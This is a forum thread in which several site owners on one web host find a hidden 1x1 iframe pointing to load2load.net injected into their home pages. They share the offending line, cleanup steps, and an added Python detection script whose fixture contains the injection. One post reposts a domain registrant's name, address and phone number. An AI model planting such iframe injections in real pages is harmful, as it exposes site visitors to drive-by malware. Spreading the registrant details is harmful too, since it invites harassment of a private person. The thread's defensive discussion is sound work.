New Trojan? Any had a problem with Load2load.net before?

Funboy

Member
Jan 23, 2000
134
0
0
Has anyone heard of load2load.net?

I've never seen anything like this before -

I have my own personal website and yesterday I checked it out online at work and it froze my entire computer. So I went home and tried it on my computer there - it locked up also and gave me some error (didn't write it down at the time). Tried the website on a third computer and the same lock up occurred.

I looked at the source code on the offending homepage - it's completely the same as the last version (1 month ago), except that the new broken page had the following code inserted at the very beginning, before the <'head> tag....



<'iframe src='http://www'.load2load.net/out.php?s_id=1' width=1 height=1><'/iframe>

<'html>
<'head>



How did something edit my website's source code? Is this some type of virus or trojan?
 

RebateMonger

Elite Member
Dec 24, 2005
11,586
0
0
I'm not an expert at such things, but it looks like somebody added code to create a 1x1 pixel frame on your web site that presumably attempts to load nasty stuff on whoever views your web site. The 1x1 pixel frame is a tiny web page hidden on your web page, that can attempt to do bad things to the viewer's computer or browser.

The domain, load2load.net, is registered to somebody in the U.S., but its nameservers are in Romania. Not a really good sign. The domain name is two weeks old.

Domain information for load2load.net

How did this happen?

Well, most likely, either you didn't set proper security permissions on your web site or the company that hosts your site didn't do its job. Also, there are TONS of both Linux and Windows web servers out there that aren't fully patched. Or maybe you just used an easily-broken password.

Or, less likely, somebody used an unpatched exploit to gain access to your web site.
 

Funboy

Member
Jan 23, 2000
134
0
0
Thanks for the reply. I'm alerting my hosting company to let them know and see if they have any insight.

As far as security permissions - what should I be looking for that a "hacker" could take advantage of? Any specifics that I could include on my email to the web hosting company? (ipowerweb.com)

Thanks again
 

BadThad

Lifer
Feb 22, 2000
12,100
49
91
I'm not an expert at such things, but it looks like somebody added code to create a 1x1 pixel frame on your web site that presumably attempts to load nasty stuff on whoever views your web site. The 1x1 pixel frame is a tiny web page hidden on your web page, that can attempt to do bad things to the viewer's computer or browser.

That's exactly what that is.
 

BadThad

Lifer
Feb 22, 2000
12,100
49
91
Registrant:

Brian Artz *****@mail.com
944 Sunnyside Rd

York, PA 17404
US
780-462-1152 Fax:

Administrative Contact:
Brian Artz *****@mail.com
944 Sunnyside Rd

York, PA 17404
US
780-462-1152

I'd call this guy and quiz him, lol.
 

Funboy

Member
Jan 23, 2000
134
0
0
Thanks for the help everyone.

My webhosting company just emailed me back -

"Regarding the source code added to your pages, they would have gained access to your site most likely by generating your password using a password auto-generator. This is very easy to accomplish, particularly if you are using a non-secure password. If your password does not look something like 7As6DaTr then it is not a secure password. We have not received any other reports of websites being hacked, so someone hacking the server itself is unlikely.

As far as preventing this from happening again, there is nothing we can do to guarantee it won't happen again. We keep our server software up-to-date with all of the newest security updates, but most website hacks are through exploits with account passwords and website code. We cannot do anything to prevent those intrusions."


They basically said it was my problem, which at this point I'm still not sure of. I don't know if this occurred because of something on my end or theirs.

My main concern is making sure it doesn't happen again.
 

mechBgon

Super Moderator / Elite Member
Oct 31, 1999
30,699
1
0
Give your account a strong password.

1) make it long, like 12+ characters.

2) use numerals, upper-case and lower-case letters, and symbols.

3) use one or more ALT characters (hold down the ALT key, then type 0176 on the keyboard, and you get a ° symbol, for example).

So for example, a strong password might be 98.6°F=tehBodayTemperature. Let's see 'em crack that by auto-generation :evil:
 

BadThad

Lifer
Feb 22, 2000
12,100
49
91
Originally posted by: mechBgon
Give your account a strong password.

1) make it long, like 12+ characters.

2) use numerals, upper-case and lower-case letters, and symbols.

3) use one or more ALT characters (hold down the ALT key, then type 0176 on the keyboard, and you get a ° symbol, for example).

So for example, a strong password might be 98.6°F=tehBodayTemperature. Let's see 'em crack that by auto-generation :evil:

HAHAHAHA....Indeed. :thumbsup:
 

mechBgon

Super Moderator / Elite Member
Oct 31, 1999
30,699
1
0
Hehe... and BTW Funboy, also scan your computer with a couple of antivirus scanners in case there's a keystroke logger on there that you don't know about. The strongest password in the world won't help, if they can see everything you type.
 

ynot

Junior Member
Apr 12, 2006
2
0
0
I hate to be the bearer of bad news, but I bet it's not your password (though it's always a good policy to make it strong).
If I had to take a stab in a dimly lit room, I'd guess that your host is iPower.

I've had 10 (yes TEN) of my clients who host with them have this same hack/infection. Each time iPower was called they gave that song and dance about the 'password must be compromised'. Some of these clients have VERY strong passwords. Some of these clients haven't even accessed their hosting accounts in a year or more (so it can't be recent keylogging). Some of them I don't know the passwords for (if you're wondering if I am the common link, I don't have access to all their accounts).
Their one commonality is the host. And the host doesn't seem to care that the same problem is being reported over and over again (not even taking details about the hack when support is called), so your chances of it happening again with them (if that's your host) are pretty high.
FYI, the offending domain (load2load) has changed once since the first couple of infections I saw (same implementation), so I expect it will change again (when this one gets shut down for violating registration and hosting agreements). And if you haven't already, send an abuse report to the registrar of record -- at least it will slow the culprit and the spread down.

 

bumpski

Junior Member
Apr 15, 2006
1
0
0
Hi

Thanks Ynot for posting your experience. One of my IPowerWeb sites was "hacked" in the same way a couple of days ago. I do have other accounts that have gone untouched. IPowerWeb did not inform me of other occurrences, which is disappointing. The lack of information from IPowerWeb made me do extra work that was perhaps unnecessary. Now I'll probably implement an automatic content verification system to detect future occurrences. I monitor this particular site fairly infrequently and was lucky I caught the problem. I should have been tipped off when tech support seemed so familiar with the one line hack and the fact it was typically only done to the home page.

With reverse DNS it is now very easy to see all the other IPowerWeb clients so it is tempting to start a cooperative IPowerWeb monitor.
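An added example (not bumpski's system and not anything from iPowerWeb) of the kind of automatic content verification described above: it compares the published home page against a known-good hash and additionally flags the two injection patterns reported in this thread, a 1x1 iframe at the top of the page and a display:none div stuffed with links at the bottom. The sample pages are constructed here so the script runs offline; in practice you would fetch the live index page and store the baseline digest out of band.

```python
"""Content verification for a static home page (constructed example)."""
import hashlib
import re

# Constructed: the page as the owner last published it.
GOOD_INDEX = ("<html>\n<head><title>My site</title></head>\n"
              "<body><p>Hello</p></body>\n</html>\n")

# Constructed: the same page after the injection described in the thread
# (tiny iframe prepended, hidden link block appended; link host is a placeholder).
HACKED_INDEX = (
    "<iframe src='http://www.load2load.net/out.php?s_id=1' width=1 height=1></iframe>\n"
    + GOOD_INDEX
    + "<div style='overflow:auto; display:none; height: 1px;'>"
      "<a href='http://spam.invalid/a/'>buy a</a><a href='http://spam.invalid/b/'>buy b</a>"
      "<a href='http://spam.invalid/c/'>buy c</a></div>\n"
)

# An iframe whose width or height is 0 or 1 pixel.
TINY_IFRAME = re.compile(
    r"<iframe\b[^>]*\b(?:width|height)\s*=\s*['\"]?[01]\b[^>]*>", re.I)
# A display:none div containing two or more links and nothing else.
HIDDEN_LINK_DIV = re.compile(
    r"<div\b[^>]*display\s*:\s*none[^>]*>(?:\s*<a\b[^>]*>.*?</a>\s*){2,}</div>",
    re.I | re.S)


def sha256_text(text: str) -> str:
    """Digest of the page; store the baseline value somewhere the host can't edit."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def check_page(current: str, baseline_digest: str) -> dict:
    """Report whether the page changed and which known injection patterns appear."""
    return {
        "modified": sha256_text(current) != baseline_digest,
        "tiny_iframes": [m.group(0) for m in TINY_IFRAME.finditer(current)],
        "hidden_link_divs": len(HIDDEN_LINK_DIV.findall(current)),
    }


if __name__ == "__main__":
    baseline = sha256_text(GOOD_INDEX)
    for name, page in (("good", GOOD_INDEX), ("hacked", HACKED_INDEX)):
        print(name, check_page(page, baseline))
```

Any "modified" result is worth a look even when no pattern matches, since the injected domain in this thread already changed once.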
 

ynot

Junior Member
Apr 12, 2006
2
0
0
Yeah, keep watching your other iPower sites -- mine were not infected all at once. They all happened over a period of the last 2 months. I haven't figured out a pattern of infection - I should check IP sequence maybe the next time.
I think monitoring is a good idea and a co-op would be cool. One of the reasons I posted at all was in case other IPower folks went out searching for info on this hack. I want them to know they are not alone. All I did for my clients was restore the index.htm from backup. The first couple I did extensive search and analysis and didn't find any other hacks or compromises on their accounts, so it's just a simple one-step: restore, or edit the offending line out of index.htm using a NON-WYSIWYG editor. On iPower you have to turn this feature off if you're editing through their control panel, which you access through Preferences, and you can go back and turn it back on after editing the line out.
Let me know if you see your other sites affected...
 

fadedlazer

Junior Member
May 2, 2006
1
0
0
I have recently found the same load2load iframe on my index, hosted by ipower. I am on a shared server as well. I have not found any other files changed, and it looks like it only affects your index page. Here is a post of the mysterious html that was inserted on the page in hopes that it helps anyone else out...

Top of code:
<iframe src='http://www.load2load.net/out.php?s_id=6' width=1 height=1></iframe>

Bottom/End of page code:
 

StoneUSA7

Junior Member
May 3, 2006
1
0
0
Same just happened to one of the sites I manage on IpowerWeb. Those guys must have gotten hacked directly. The front page had been modified 2 days ago (May 1st) and was iframe linking to load2load.net.

Really frustrating to hear that iPowerWeb isn't doing much about it. I guess I'm just replying to raise my hand and say it happened to me as well and I'll be checking all the other sites I have with them as I write.

*EDIT*

Make that 3 of the sites I manage on iPowerWeb. Great.
 

Lynxfx

Junior Member
May 3, 2006
1
0
0
Raising my hand as well. Two of my ipower websites were hit. Did a search on load2load and found this thread. So far no answer from the live tech support. Guess they are getting hit with users. Sounds like the issue is on their end but just in case I went through every site and changed the password to an even stronger randomly generated password.

Losing faith in ipowerweb. I go between them and startlogic and it looks like I might stay more on the startlogic side.
 

thefigure

Junior Member
May 5, 2006
1
0
0
I use Ipowerweb and until now have had no problems.

I have just discovered one of my sites was hijacked. I removed the load2load line in the index page and now it is ok.

When I went to this site, my anti-virus programs came up immediately and locked out download.trojan.

Another site was locked out by Ipowerweb for unknown reasons for a few days (it showed the vdeck screen). It came back up when I sent an email over their techsupport page. (haven't got an answer on that one yet).